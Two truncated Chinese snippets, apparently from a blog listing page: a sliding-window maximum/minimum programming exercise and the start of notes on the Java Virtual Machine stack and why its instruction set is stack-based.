例题 有一个长为 n 的序列 a&#xff0c;以及一个大小为 k 的窗口。现在这个从左边开始向右滑动&#xff0c;每次滑动一个单位&#xff0c;求出每次滑动后窗口中的最大值和最小值。 例如&#xff1a; The array is [1,3,−1,−3,5,3,6,7],and k3。 输入格式 输入一共有两行…

4. 虚拟机栈

4.1. 虚拟机栈概述 4.1.1. 虚拟机栈出现的背景 由于跨平台性的设计&#xff0c;Java的指令都是根据栈来设计的。不同平台CPU架构不同&#xff0c;所以不能设计为基于寄存器的。 优点是跨平台&#xff0c;指令集小&#xff0c;编译器容易实现&#xff0c;缺点是性能下降&…